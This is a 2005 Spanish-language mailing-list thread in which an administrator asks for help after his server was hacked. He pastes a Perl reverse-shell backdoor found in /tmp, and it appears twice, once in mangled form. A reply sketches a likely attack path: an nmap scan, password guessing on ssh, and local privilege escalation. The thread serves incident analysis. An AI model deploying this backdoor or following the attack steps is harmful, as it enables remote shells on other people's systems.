> Distribucion? Kernel?Firewall? Paquetes instalados? Servicios que corria?

Distribucion RedHat 9
kernel 2.4.20-8
firewall iptables configuracion basica solo permitia ftp y web
paquetes instalados. la base + los paquetes de apache mysql php y
pureftpd oficial compilado.

PS: se que esta es una lista debian, pero necesito recaudar datos
hacerca del tema. es preocupante lo que sucedio. pido disculpas si
molesto a alguien. :-)

> 
> > en primera instancia puedo creer que el ataque fue hecho via web ya que
> > la maquina en si.. no tiene contacto fisico alguno con el exterior  a
> > escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en
> > chroot).
> 
> Usuarios virtuales en chroot: podrias  ampliarnos el concepto?

pure-ftp permite crear usuarios virtuales atados a un grupo existente en
la makina sin necesidad de crear el usuario de sistema, solo
virtualmente y lo del chroot es que el usuario queda atado netamente a
el "home" o directorio que uno establece para su uso al momento de
generar el usuario

> 
> Los paquetes instalados eran todos de repositorios oficiales?
> 
> > el sintoma fue claro.. de un 2 por 3 se calleron los servicios de web
> > bases de datos ssh y el equipo se colgo..
> > 
> > fue una gran sorpresa al darme cuenta que cuando inicie la makina en
> > modo rescate  /var estaba vacio practicamente piendo en un rm
> > -rf /var :-(...  por ende.. no tengo logs para buscar algun tipo de
> > atake.. pero buscando en /tmp  encontre algo interezante un archivo
> > llamado _conex.pl_
> > 
> > cuyo contenido muestro aqui.
> > > 
> 
> [Codigo perl de una puerta trasera]
> Lo que entiendo es que te instalaron y ejecutaron un programa para abrir
> una puerta traseracon exito.
> Lo que no me queda claro es si para acceder a tu host explotó alguna vuln o
> lo hizo desde dentro...en tal caso...como entro?
> 
> Saludos


eso es lo que me pregunto yo =/..
lo mas extraño es.. como llego el exploit ahi. de que forma ya que ni
por ssh pudo haber llegado hasta ahi.

la maquina esta detras de un router con ip privada solo acediendo a el
con redireccion de puertos.


> > y me dije que diablos !!!...
> > entonces.. me decidi a preguntar a la lista por si alguien mas o menos
> > entiende este script o podria decir como funciona.. para tomar
> > precauciones en la proxima reinstalacion del servidor. y asi protejer
> > mejor los servicios.  y claro esta.. asi  todos aprendemos un poquito
> > mas de seguridad que es tan importante.
> > Ojala alguien pueda acalrar un poco mi Duda y asi poder entregar un
> > informe claro y Tecnico de lo sucedido aqui.
> > 
> > Atentamente
> > Nelson Lopez.
> > 
> > 
> 
> 
> - --
> Ricardo A.Frydman
> Consultor en Tecnología Open Source
> Administrador de Sistemas
> http://www.eureka-linux.com.ar
> 
> 
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.1 (GNU/Linux)
> 
> iD8DBQFCqcSzkw12RhFuGy4RAnKHAJ4ujgjwVWJMWRR6CHi7wzHKZ/33dQCePD4P
> 5vvvpYMiqb7AVNXNUepXBBs=
> =RIz4
> -END PGP SIGNATURE-
> 
> 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Re: Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema navickator shadow 
Hola.

Bueno, primero que todo mi sentido pesame por tu servidor
espero que renasca de las cenizas y sea mejor que antes :)

ok, iniciemos, voy a plantear una posibilidad de lo que sucedio
en tu servidor.

el atacante lo primero que realizo fue un scaneo de puertos
desde alguna maquina remota que tal vez ya estaba comprometida
o que tal vez era su maquina real o un proxy... no sabemos
miro los puertos

nmap -sS -sV -O -v -P0 tuip

con esto consiguio pasarte por encima de tu firewall si lo tenias y obtener 
una lista de los puertos abiertos de tu servidor junto con
las versiones de los demonios que ellos corrian.

ya teniendo esto y observando que tenias el ftp y sshd abiertos 
la tarea que le sigue es buscar en la pagina en internet o en google 
buscando correos electronicos por ejemplo [EMAIL PROTECTED]
...bueno, teniendo estas cuentas y siendo obtimistas de que 
en tu servidor creaste usuarios reales en el sistema y no
en una base de datos y que a ellos le colocaste en la shell /bin/bash
en vez de de /bin/false... el atacante inicia en la busqueda de un exploit
para tus demonios, si no lo encuentra entonces iniciara un 
ataque de diccionario sobre tus servicios, creo que inicio por
el sshd... suponiendo que despues de varias horas de intentar 
obtuvo una entrada a tu sistema por medio de un usuariohttp://www.google.com.co/
con una muy mala contraseña... luego el atacante ya tiene una shell
e inicia en la busqueda de errores internos en busqueda de una 
escalada de privilegios, puede buscar programas con SUID o detenerse
y observar en securityfocus.com cientos de errores de seguridad
que puede contener tu sistema.
Suponiendo de despues de varias horas escaneando tu sistema por dentro
y teniendo un exploit local consiguio acceso al root... despues de este punto
tu maquina ya esta perdida y no hace falta imaginarnos que podria hacer
con este poder!!!

El script en perl que nombras es muy sencillo.
el recive dos parametros que son los siguiente el nombre del host y su ip
envia una peticion a dicho puerto de el nombre de la maquina y una shell
claro que este script no funciona para nada si antes inicialisaste un puerto
con shell... me explico: esto se haria por ejemplo con netcat, este permite
crear un demonio que escuche determonado puerto y que cuando el se conecte
le sirva un determinado archivo, ejemplo /bin/sh

entonces el atacante ejecuta el guion en perl para conectarse a otra maquina objetivo
conclusion: utiliso tu maquina como puente para atacar otras redes.
claro que podria suponer que es muy novato o un scriptkid ya que destruyo
tu sistema... yo permaneceria con una cuenta privilegiada en tu sistema :)

Bueno, creo que eso es todo por el momento... si seme ocurre algomas estare escribiendo

Saludos.
El día 10/06/05, Nelson <[EMAIL PROTECTED]> escribió:
Hola me dirijo a ustedes ya que necesito intentar rehacer una escena delcrimen contra un servidor que fue hackeado :-(en primera instancia puedo creer que el ataque fue hecho via web ya quela maquina en si.. no tiene contacto fisico alguno con el exterior  a
escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales enchroot).el sintoma fue claro.. de un 2 por 3 se calleron los servicios de webbases de datos ssh y el equipo se colgo..fue una gran sorpresa al darme cuenta que cuando inicie la makina en
modo rescate  /var estaba vacio practicamente piendo en un rm-rf /var :-(...  por ende.. no tengo logs para buscar algun tipo deatake.. pero buscando en /tmp  encontre algo interezante un archivollamado _conex.pl_
cuyo contenido muestro aqui.--C O D E-#!/usr/bin/perl# Remote Connect-Back Backdoor Shell v1.0.# (c)AresU 2004# 1ndonesia Security Team (1st)# AresU[at]bosen.net
# Usage:# 1) Listen port to received shell prompt using NetCat on your toolbox,for example: nc -l -p 9000# 2) Remote Command Execution your BackDoor Shell, for example: perlconnect.pl  
# # The supplied exploit code is not to be used for malicious purpose, butfor educational purpose only. The Authors and 1ndonesian Security TeamWILL NOT responsible for anything happened by the couse of using all
information on these website.# -use Socket;$pamer="(c)AresU Connect-Back Backdoor Shell v1.0\n1ndonesia SecurityTeam (1st)\n\n";$cmd= "lpd";$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");print STDOUT $pamer;system($system);close(STDIN);close(STDOUT);close(STDERR);--F I N  C O D E-y me dije que diablos !!!...
entonces.. me decidi a preguntar a la lista por si alguien mas o menosentiende este script o podria decir como funciona.. para tomarprecauciones en la proxima reinstalacio

Re: Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema Ricardo Frydman 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Nelson wrote:
> Hola me dirijo a ustedes ya que necesito intentar rehacer una escena del
> crimen contra un servidor que fue hackeado :-(
Distribucion? Kernel?Firewall? Paquetes instalados? Servicios que corria?

> en primera instancia puedo creer que el ataque fue hecho via web ya que
> la maquina en si.. no tiene contacto fisico alguno con el exterior  a
> escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en
> chroot).

Usuarios virtuales en chroot: podrias  ampliarnos el concepto?

Los paquetes instalados eran todos de repositorios oficiales?

> el sintoma fue claro.. de un 2 por 3 se calleron los servicios de web
> bases de datos ssh y el equipo se colgo..
> 
> fue una gran sorpresa al darme cuenta que cuando inicie la makina en
> modo rescate  /var estaba vacio practicamente piendo en un rm
> -rf /var :-(...  por ende.. no tengo logs para buscar algun tipo de
> atake.. pero buscando en /tmp  encontre algo interezante un archivo
> llamado _conex.pl_
> 
> cuyo contenido muestro aqui.
> > 

[Codigo perl de una puerta trasera]
Lo que entiendo es que te instalaron y ejecutaron un programa para abrir
una puerta traseracon exito.
Lo que no me queda claro es si para acceder a tu host explotó alguna vuln o
lo hizo desde dentro...en tal caso...como entro?

Saludos
> y me dije que diablos !!!...
> entonces.. me decidi a preguntar a la lista por si alguien mas o menos
> entiende este script o podria decir como funciona.. para tomar
> precauciones en la proxima reinstalacion del servidor. y asi protejer
> mejor los servicios.  y claro esta.. asi  todos aprendemos un poquito
> mas de seguridad que es tan importante.
> Ojala alguien pueda acalrar un poco mi Duda y asi poder entregar un
> informe claro y Tecnico de lo sucedido aqui.
> 
> Atentamente
> Nelson Lopez.
> 
> 


- --
Ricardo A.Frydman
Consultor en Tecnología Open Source
Administrador de Sistemas
http://www.eureka-linux.com.ar


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFCqcSzkw12RhFuGy4RAnKHAJ4ujgjwVWJMWRR6CHi7wzHKZ/33dQCePD4P
5vvvpYMiqb7AVNXNUepXBBs=
=RIz4
-END PGP SIGNATURE-


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Opiniones ?... Seguridad/hacking-.

2005-06-10 Por tema Nelson 
Hola me dirijo a ustedes ya que necesito intentar rehacer una escena del
crimen contra un servidor que fue hackeado :-(

en primera instancia puedo creer que el ataque fue hecho via web ya que
la maquina en si.. no tiene contacto fisico alguno con el exterior  a
escepcion de http(apache) ftp(pure-ftpd con usuarios virtuales en
chroot).

el sintoma fue claro.. de un 2 por 3 se calleron los servicios de web
bases de datos ssh y el equipo se colgo..

fue una gran sorpresa al darme cuenta que cuando inicie la makina en
modo rescate  /var estaba vacio practicamente piendo en un rm
-rf /var :-(...  por ende.. no tengo logs para buscar algun tipo de
atake.. pero buscando en /tmp  encontre algo interezante un archivo
llamado _conex.pl_

cuyo contenido muestro aqui.


--C O D E-

#!/usr/bin/perl
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# AresU[at]bosen.net
# Usage:
# 1) Listen port to received shell prompt using NetCat on your toolbox,
for example: nc -l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl
connect.pl  
# 
# The supplied exploit code is not to be used for malicious purpose, but
for educational purpose only. The Authors and 1ndonesian Security Team
WILL NOT responsible for anything happened by the couse of using all
information on these website.
# -

use Socket;
$pamer="(c)AresU Connect-Back Backdoor Shell v1.0\n1ndonesia Security
Team (1st)\n\n";
$cmd= "lpd";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
print STDOUT $pamer;
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

--F I N  C O D E-

y me dije que diablos !!!...
entonces.. me decidi a preguntar a la lista por si alguien mas o menos
entiende este script o podria decir como funciona.. para tomar
precauciones en la proxima reinstalacion del servidor. y asi protejer
mejor los servicios.  y claro esta.. asi  todos aprendemos un poquito
mas de seguridad que es tan importante.

Ojala alguien pueda acalrar un poco mi Duda y asi poder entregar un
informe claro y Tecnico de lo sucedido aqui.

Atentamente
Nelson Lopez.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]